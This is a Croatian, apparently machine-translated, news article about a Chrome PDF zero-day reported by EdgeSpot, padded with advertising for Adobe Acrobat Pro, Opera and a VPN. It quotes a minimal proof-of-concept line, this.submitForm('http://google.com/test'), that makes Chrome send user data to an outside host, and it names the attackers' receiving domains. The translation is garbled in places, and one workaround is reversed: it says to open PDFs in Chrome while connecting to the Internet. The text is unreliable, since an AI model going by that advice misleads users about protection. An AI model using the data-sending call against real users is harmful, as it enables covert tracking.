- EdgeSpot otkrio je intrigantnu ranjivost nultih dana koja iskorištava PDF dokumente u Chromeu.
- Ovaj ranjivost može vam naštetiti prikupljanjem osjetljivih podataka na vašem računalu.
- Istražite naše Stranica Web i oblak za više uvida o drugim alatima i uslugama.
- Ako ste zainteresirani za preglednike, pružit ćemo puno informacija o njima u našem Čvorište preglednika.
Učinite sve svoje dokumente dostupnima i sigurnima pomoću programa Adobe Acrobat Reader. Ovaj alat za upravljanje dokumentima također će vam omogućiti e-potpis i stvaranje službenih obrazaca kako biste uštedjeli vrijeme na poslu. Nabavite ga za svoje računalo i moći ćete:
- Otvorite, ispišite i uredite sve svoje PDF i druge vrste datoteka
- Lakše ispunite PDF obrasce
- Neka vaši osnovni dokumenti budu šifrirani
Nabavite sve aplikacije po posebnoj cijeni!
Svjetski softver za upravljanje dokumentima br. 1 sada je po povoljnoj cijeni, zato požurite!
Usluga otkrivanja eksploatacije EdgeSpot otkrila je intrigantan Krom nul-dnevna ranjivost koja koristi PDF dokumente.
Ranjivost omogućuje napadačima da žetve osjetljivih podataka pomoću zlonamjernih PDF dokumenata otvorenih u Chromeu.
Čim žrtva otvori odgovarajuće PDF datoteke u Google Chromeu, zlonamjerni program počinje raditi u pozadini prikupljanjem korisničkih podataka.
Podaci se zatim prosljeđuju na udaljeni poslužitelj kojim upravljaju hakeri. Možda se pitate koje podatke napadači usisavaju, oni ciljaju sljedeće podatke na vašem računalu:
- IP adresa
- Puni put PDF datoteke na sustavu
- Verzije OS-a i Chromea
Čuvajte se PDF datoteka s malware-om
Stručnjaci uočen da je jedna od dvije domene readnotify [.] com ili burpcollaborator [.] net je primao podatke.
Otkrili su da napadači koriste this.submitForm () PDF Javascript API za prikupljanje osjetljivih podataka korisnika.
Testirali smo ga s minimalnim PoC-om, jednostavnim API pozivom this.submitForm (‘ http://google.com/test’) natjerat će Google Chrome da pošalje osobne podatke na google.com.
Ovu su programsku pogrešku u Chromeu iskorištavale dvije različite skupine zlonamjernih PDF datoteka, obje koje su cirkulirale u listopadu 2017., odnosno u rujnu 2018. godine.
Značajno je da prikupljeni podaci napadači mogu koristiti za fino podešavanje napada u budućnosti. Izvješća sugeriraju da je prva serija datoteka sastavljena pomoću usluge praćenja PDF-a ReadNotify.
Korisnici mogu koristiti uslugu za praćenje korisničkih pregleda. EdgeSpot nije podijelio nikakve detalje u vezi s prirodom drugog seta PDF datoteka.
Kratki savjet: Promijenite preglednik u Opera
U ovim nemirnim vremenima napadnuti smo zlonamjernim softverom, krađom identiteta i trojanskim virusima na svakom koraku, tako da moramo biti puno oprezniji i ostati zaštićeni.
A kako je ovo problem specifičan za Chrome, tu prijetnju i sve ostale možete izbjeći pomoću sigurnosno orijentiranog preglednika poput Opera.
Ovaj preglednik dolazi s ugrađenim alatom za blokiranje oglasa koji ne samo da uklanja takve smetnje već i blokira analitičke skripte, pikseli za praćenje i metode za prikupljanje vaših podataka.
A ako želite biti potpuno sigurni da se klonite bilo kakve opasnosti, stanite iza ugrađenog VPN uslugu koju je 100% besplatno koristiti neograničeno vrijeme.
Opera
Opera nudi savršenu zaštitu od prijetnji s ugrađenim blokadom oglasa i VPN uslugom besplatno!
Posjetite web stranicu
Kako mogu ostati zaštićen od PDF ranjivosti?
Preuzmite Adobe Acrobat PRO
Adobe i Chrome dobro se slažu kada je riječ o rukovanju PDF datotekama. Instaliranjem Adobe Extension za Chrome možete pregledavati i manipulirati PDF-ovima po svom ukusu bez napuštanja omiljenog preglednika.
Unatoč robusnoj strukturi, zlonamjerni softver skriven u PDF datotekama možda neće biti otkriven ako upotrebljavate standardnu verziju programa Reader.
Preporučuje se profesionalna verzija koja jamči vašu zaštitu i štiti vaše podatke od hakera.
Iako nije besplatna, cijena koju ćete platiti prilično je mala za mnoštvo dodatnih značajki u kojima ćete uživati, uključujući pojačanu sigurnost PDF datoteka.
Uključeno je i 7-dnevno besplatno probno razdoblje, tako da prije kupnje možete probati puno iskustvo Pro-a.
Adobe Acrobat PRO
Izbjegavajte zlonamjerni softver preuzimanjem Adobe Acrobat PRO. Ima puno više značajki od besplatne verzije i štiti vaše podatke.
Posjetite web stranicu
U slučaju da želite biti sigurni tijekom surfanja internetom, morat ćete dobiti potpuno posvećeni alat za zaštitu svoje mreže. Instalirajte privatni pristup internetu odmah i osigurajte se. Štiti vaše računalo od napada tijekom pregledavanja, maskira vašu IP adresu i blokira sav neželjeni pristup.
Usluga otkrivanja Exploita EdgeSpot željela je upozoriti korisnike Chromea o potencijalnim rizicima jer se nije očekivalo da će zakrpa biti objavljena u bliskoj budućnosti.
EdgeSpot je prošle godine izvijestio Google o ranjivosti, a tvrtka je obećala objaviti zakrpu krajem travnja.
Međutim, možete razmotriti privremeno rješenje problema lokalnim pregledom primljenih PDF dokumenata pomoću druge aplikacije za čitanje.
Možete i otvoriti PDF dokumente u Chromeu tako što ćete svoje sustave povezati s Internetom.
Često postavljana pitanja
Da, ima. Ali ako želite širi izbor, istražite naše najbolje odabire za Kromprivatnost proširenja u ovaj cjeloviti vodič.
Tevo puno proširenja koja dopuštaju PDF-ovi obrada. Ček van naše izvrstan vodič o najboljim PDF proširenjima za Chrome.
Nije, ali možete ga brzo aktivirati. Evo našeg sveobuhvatan vodič o tome kako omogućiti generator QR koda u Chromeu.
